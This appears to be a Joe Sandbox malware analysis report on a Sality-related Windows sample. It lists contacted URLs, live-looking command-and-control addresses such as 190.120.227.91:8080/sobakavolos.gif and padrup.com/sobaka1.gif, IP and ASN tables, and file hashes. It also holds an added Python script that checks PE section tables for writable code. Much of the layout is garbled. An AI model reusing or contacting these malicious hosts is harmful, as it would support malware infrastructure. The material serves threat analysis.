https://loki.delve.office.com/api/v1/configuration/cortana | SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.office.com/ | SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://kukutrustnet777888.info/DisableTaskMgrSoftware | PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs | SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/ | PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmp | false | | unknown
https://www.msn.com/spartan/mmxh | SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalogp | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://substrate.office.com/M365.Access | SearchApp.exe, 0000000F.00000000.1617033060.000001F4AEC86000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.ng.com | SearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.office.com/User.ReadWrite | SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs | SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/ | SearchApp.exe, 0000000F.00000000.1587591500.000001F4AE17E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://graph.windows.net/ | SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalog | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/de-ch/play/games/basketball-frvr/cg-9npd4c9369l0 | SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://unitedstates4.ss.wd.microsoft.us | smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://gcchigh.loki.office365.us/api/v1/configuration/cortana | SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profilep | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://unitedstates2.ss.wd.microsoft.us | smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://unitedstates1.ss.wd.microsoft.us | smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340F | PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                                                                                                                                                            https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://padrup.com/sobaka1.gif?3467cb5=274755465#PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://schemas.datacontract.org/2004/07/Store.Purchase.DataModelpWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://substrate.office.com/M365.Accesshttps://outlook.office.com/User.ReadWriteSearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=6534871858PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000F.00000000.1547534482.000001EC9A36A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1545849761.000001EC9969A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                        unknownItaly
                                                                                                                                                                                                        197589ALFANEWSITfalse
                                                                                                                                                                                                        121.243.130.85
                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                        17908TCISLTataCommunicationsINfalse
                                                                                                                                                                                                        77.81.224.130
                                                                                                                                                                                                        unknownItaly
                                                                                                                                                                                                        31034ARUBA-ASNITfalse
                                                                                                                                                                                                        93.114.177.116
                                                                                                                                                                                                        unknownRomania
                                                                                                                                                                                                        51102IMPATT-ASMihaiViteazunr6D3126ROfalse
                                                                                                                                                                                                        89.41.154.115
                                                                                                                                                                                                        unknownRomania
                                                                                                                                                                                                        6910DIALTELECOMROfalse
                                                                                                                                                                                                        220.94.117.230
                                                                                                                                                                                                        unknownKorea Republic of
                                                                                                                                                                                                        4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                        122.169.249.87
                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                        24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                                                                                                                        58.140.114.152
                                                                                                                                                                                                        unknownKorea Republic of
                                                                                                                                                                                                        10036CNM-AS-KRDLIVEKRfalse
                                                                                                                                                                                                        61.95.152.112
                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                        9498BBIL-APBHARTIAirtelLtdINfalse
                                                                                                                                                                                                        93.114.228.238
                                                                                                                                                                                                        unknownSpain
                                                                                                                                                                                                        29119SERVIHOSTING-ASAireNetworksESfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1536844
Start date and time:2024-10-18 09:37:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 12s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:35
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:PfBjDhHzvV.exe
renamed because original name is a hash value
Original Sample Name:31bbb64aa3c1753cd99c865869b58023.exe
Detection:MAL
Classification:mal100.spre.troj.evad.winEXE@3/34@1/51
EGA Information:
• Successful, ratio: 15.4%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 99
• Number of non-executed functions: 48
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3032 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3300 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3364 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3888 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4256 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4432 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4548 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4692 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 5744 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 6644 because it is empty
• Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 6748 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeleteValueKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetValueKey calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• VT rate limit hit for: PfBjDhHzvV.exe
Time | Type | Description
03:38:12 | API Interceptor | 601314x Sleep call for process: PfBjDhHzvV.exe modified
03:38:13 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
03:38:24 | API Interceptor | 947x Sleep call for process: explorer.exe modified
03:38:38 | API Interceptor | 2x Sleep call for process: sihost.exe modified
03:38:56 | API Interceptor | 20215x Sleep call for process: faawXJQQDELvfTymNiVz.exe modified
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        77.81.228.77SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                          190.120.227.91SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                          • 190.120.227.91:8080/sobakavolos.gif?e72c79e7=-416515609
                                                                                                                                                                                                          115.119.58.98SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                            189.35.177.247SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                              94.55.239.88SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                195.42.129.188SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                  81.180.90.149SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                    185.53.178.50SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                    • padrup.com/sobaka1.gif?e63fce22=2134836906
                                                                                                                                                                                                                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.53.178.50/
                                                                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.29279.29610.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.erminia.net/m49z/?Pbv=5jRLFfAHQxSlbh&jPgXH=YISnM5ovClGfRBNlug7t/bT4HKeyd0lIhqIihSOsPTkwr73PRG8iY85wP5Wvf2BGU1MY
                                                                                                                                                                                                                    http://fgoogle.deGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • fgoogle.de/favicon.ico
                                                                                                                                                                                                                    RFQ Ref. No. MS-DGP-220137.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.citasenlineabuscarmex.com/s32s/?X48DY=e1mxKMi98/LeHhnzWL/vnJ7rrniDAkIEtnvYqA+He0Na+XzS61P0KFnf2ea50viiW/zG0elXXQ==&h0=7n-p6N-hWtqH3R
                                                                                                                                                                                                                    Factura_842.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.autoinsuranceblog.online/ss5s/?4hlpd=hPRD&C8aX_v2X=Q6Fn6P47y8FyKnQottYd/zoaJzDc3jCGJ5kbYGNqycBtKEEoN293YMs24B+VMRpimMwC
                                                                                                                                                                                                                    New_1007572_021.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h
                                                                                                                                                                                                                    124.123.112.184SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: padrup.com
  SecuriteInfo.com.Win32.Sector.30.19697.26848.exe | malicious | Sality | 185.53.178.50
  http://padrup.com/sobaka1.gif?51edc42=601359822 | malicious | Unknown | 206.189.61.126
  TzIxyOFL2Y.exe | malicious | Sality | 206.189.61.126
  iwV2wYLBqJ.exe | malicious | Unknown | 206.189.61.126
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: SARAONLINEINFORMATICAEIRELI-MEBR
  SecuriteInfo.com.Win32.Sector.30.19697.26848.exe | malicious | Sality | 190.120.227.91
  apavlH3Bzb.elf | malicious | Mirai | 190.120.227.218
  TzIxyOFL2Y.exe | malicious | Sality | 190.120.227.91
  hz7NY6RFBX | malicious | Mirai | 190.120.227.210
  I506VIfDY6 | malicious | Mirai | 190.120.227.217
  MgxZMcbt68 | malicious | Unknown | 190.120.236.232
Match: TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISP
  m68k.elf | malicious | Unknown | 14.142.207.21
  m68k.elf | malicious | Mirai | 203.197.31.0
  na.elf | malicious | Mirai, Moobot | 115.113.1.233
  na.elf | malicious | Mirai | 14.143.57.89
  na.elf | malicious | Mirai | 14.143.23.142
  vEOTtk6FeG.elf | malicious | Mirai | 14.142.167.154
  RFNnJGB7wy.elf | malicious | Mirai | 59.163.33.118
  na.elf | malicious | Unknown | 202.54.109.215
  eLSH927bGM.elf | malicious | Unknown | 121.244.236.105
  na.elf | malicious | Mirai | 59.163.98.199
Match: CLAROSABR
  botnet.mips.elf | malicious | Mirai, Moobot | 187.107.39.50
  arm7.elf | malicious | Unknown | 179.158.111.68
  ppc.elf | malicious | Mirai | 189.43.200.175
  spc.elf | malicious | Mirai | 177.35.57.114
  m68k.elf | malicious | Unknown | 189.86.58.245
  i586.elf | malicious | Mirai | 179.158.111.58
  armv7l.elf | malicious | Unknown | 177.183.247.135
  mpsl.elf | malicious | Mirai | 179.159.137.216
  ppc.elf | malicious | Mirai | 187.180.71.230
  arm6.elf | malicious | Unknown | 187.123.195.17
Match: ARUBA-ASNIT
  arm7.elf | malicious | Unknown | 95.110.130.121
  seethebstthingstogetwithentirethingstobegret.hta | malicious | Cobalt Strike, FormBook | 62.149.128.40
  6ONw866NZg.elf | malicious | Mirai | 95.110.143.8
  alWUxZvrvU.exe | malicious | FormBook | 62.149.128.40
  PAYMENT ADVISE#9879058.exe | malicious | FormBook | 62.149.128.40
  High Court Summons Notice.pdf | malicious | Unknown | 95.110.136.136
  Arrival notice.exe | malicious | FormBook | 62.149.128.40
  na.elf | malicious | Mirai | 31.14.139.69
  novo.m68k.elf | malicious | Mirai, Moobot | 95.110.195.186
  SHIPPING_DOCUMENTS.VBS.vbs | malicious | FormBook | 62.149.128.40
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe | malicious | Bdaejec
  weH771UOWv.exe | malicious | Sality
  #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe | malicious | Bdaejec, Sality
  a4#Uff09.exe | malicious | Bdaejec, Sality
  aspweb.exe | malicious | Sality
  aspweb88.exe | malicious | Unknown
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4210216
                                                                                                                                                                                                                                  Entropy (8bit):6.5030627280414235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:4pawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BA:xehFLvTQDpB5oSOmlBm
                                                                                                                                                                                                                                  MD5:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                  SHA1:DC1F4774F3104DEA6A50646D6C11EFEFD2A29169
                                                                                                                                                                                                                                  SHA-256:F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
                                                                                                                                                                                                                                  SHA-512:03493D5105A3A0E8C95E6E0AC8D7F814FF075FE9D36C389067E021D55B4D75CA3BDD4D688EFA9B00D8A5E84513FF99774C2A4C9B30CC89FB8FF94154BFEB32A9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: weH771UOWv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: aspweb.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: aspweb88.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................A......<A...`..........................................'3......+3.P.....8......P6..e....@.((....A. 1..h.2.T.....................2.(...P"-.@............33.......3. ....................text...E.,.......,................. ..`.rdata..$#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc.........8.......6.............@..@.reloc.. 1....A..2....?.............@..B........................................................
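The preview of the dropped PE32+ file above shows its DOS stub, the PE signature followed by machine type 0x8664 (x86-64) and a section table with names such as .text, .00cfg, .gxfg, .retplne, CPADinfo, LZMADEC and malloc_h. The script below is an added example, not part of the Joe Sandbox report or its tooling: it walks a PE section table by hand, using only the standard library, and applies the two section-level checks an analyst would want to repeat on a dropped binary, a code section that is also writable (W+X) and section names built from characters outside the usual ASCII identifier set. The PE image it parses is a minimal PE32+ skeleton constructed inline so the example runs offline; it is not the dropped file. The section names from the preview are included only to show that all of them pass the name check.

```python
"""Walk a PE section table by hand and flag two section-level traits:
a code section that is also writable (W+X) and section names made of
characters outside the usual ASCII identifier set.

Added example, not part of the Joe Sandbox report or its tooling. The PE
image parsed below is a minimal PE32+ skeleton constructed inline (not the
dropped file) so the script runs offline; header layout and flag values
follow the PE/COFF specification."""

import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_MACHINE_AMD64 = 0x8664

# Section names visible in the report's preview of the dropped PE32+ file.
PREVIEW_SECTION_NAMES = [b".text", b".rdata", b".data", b".pdata", b".00cfg",
                         b".gxfg", b".retplne", b".tls", b"CPADinfo", b"LZMADEC",
                         b"_RDATA", b"malloc_h", b".rsrc", b".reloc"]


def parse_sections(data):
    """Return (machine, [(name, characteristics), ...]) from a raw PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    first = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsections):
        off = first + i * 40               # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0")
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, characteristics))
    return machine, sections


def is_plain_name(name):
    """Accept names like .text, .00cfg, _RDATA, malloc_h: an optional leading dot,
    then ASCII letters, digits or underscores only."""
    body = name[1:] if name.startswith(b".") else name
    return bool(body) and all(b < 0x80 and (chr(b).isalnum() or b == 0x5F) for b in body)


def audit_sections(sections):
    """Return human-readable findings for W+X sections and odd section names."""
    findings = []
    for name, chars in sections:
        shown = name.decode("latin-1")
        executable = chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
        if executable and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{shown!r}: writable code section (W+X)")
        if not is_plain_name(name):
            findings.append(f"{shown!r}: section name with special characters")
    return findings


def build_pe32plus(sections):
    """Assemble a minimal, non-loadable PE32+ image with the given section headers.
    Constructed for this example only."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))            # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(sections),
                       0, 0, 0, 240, 0x0022)
    optional = bytearray(240)                              # PE32+ optional header size
    struct.pack_into("<H", optional, 0, 0x20B)             # PE32+ magic
    headers = bytearray()
    for name, chars in sections:
        hdr = bytearray(40)
        hdr[:len(name[:8])] = name[:8]
        struct.pack_into("<I", hdr, 36, chars)
        headers += hdr
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + bytes(headers)


# Constructed sample: a writable .text plus a section whose name contains
# non-printable bytes; .rdata and .data are ordinary.
SAMPLE_SECTIONS = [
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b"\x01\x02xyz", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]


def run_demo():
    """Parse the constructed image and return (machine, findings)."""
    machine, sections = parse_sections(build_pe32plus(SAMPLE_SECTIONS))
    return machine, audit_sections(sections)


if __name__ == "__main__":
    machine, findings = run_demo()
    print(f"machine 0x{machine:04X}")
    for finding in findings:
        print(" ", finding)
```

Against a real dropped file, read it with `open(path, "rb").read()` and hand the bytes to `parse_sections`; the constructed image exists only so the example runs without the sample. The W+X check deliberately treats IMAGE_SCN_CNT_CODE and IMAGE_SCN_MEM_EXECUTE alike, since a packer can set either, and the name check is intentionally strict: legitimate toolchain sections are dot-prefixed or plain identifiers, so anything else deserves a look rather than an automatic verdict.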
                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:modified
Size (bytes):6873
Entropy (8bit):7.896151483146773
Encrypted:false
SSDEEP:192:4LRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:JnpDlA/phc6hgkEQkxVk
MD5:1382CE1BD44FA02B6C58580B02AEFA9C
SHA1:BD1AABF4EBF1BFF840C1973EBAA02C1FEDF8D6C5
SHA-256:DF1C6676A93EB0E347607F323E00F4063EDE1D19E54E7661E5CF6D0F39586E82
SHA-512:CDCDCF15D72FC7FCFD05743954C09A09911EFD3964F0F55555EC30A37DBFDC6230224154CDCEF52BD0763C99F3CAD81C0045886E122274C8AC22A01D9CD850D5
Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...2.....y.\.....gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E....a...m..7;@..
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):61800
Entropy (8bit):2.7496603699052975
Encrypted:false
SSDEEP:192:oxq+62/1fjdMj5EZjjJoGiBv8bti6ItwKbOQ6U8zeMzeKS9N1fAfH6TE87+iyAvy:kH1bdMKiVomtwoOQbCLfS7TE86tf
MD5:2B6ABABF58031191CF5DE1F5C47D04AB
SHA1:B8456FDD6EA973841803AE6413C4922D50F29EF0
SHA-256:ECB772CD0C1FA9AA865DA46B419E3624C61FC77BBD339925B0A5601A04266305
SHA-512:1BFAB0F761CD1D09482CE6FDE8754F99A4CCB54C928E2FBB27258D34F4BAABA45ADA7CEBFBA9564C561E362A3F2FEDCAEB0F274432C83753AE03B763D1F1FBFF
Malicious:false
                                                                                                                                                                                                                                  Preview:........w~].T39.p\...F........K............~.K.c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\dllhost.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.6785130725630784
Encrypted:false
SSDEEP:24:0qbYeV/bYeVvIS3cizmqbYeV/bYeVvIS3ciz:0qbDxbDWS3ciCqbDxbDWS3ci
MD5:877B90FACBB50A73525A7D67A832A387
SHA1:C82D90672BE77E3E8A4DFF747EE8CB67DCBAE4AE
SHA-256:4402ACC37D001AD218C8D0E7F15A45EDC161EE73103E33F502A9430E0C0B5622
SHA-512:1B4B58A8115034D96A48765F3A524824D6E027E9002CC62C21A1B2CBD48BBD63AD67FE6D1CA4997E8DE540EAF304420C586457D06189F7B17748FD5B34BA6616
Malicious:false
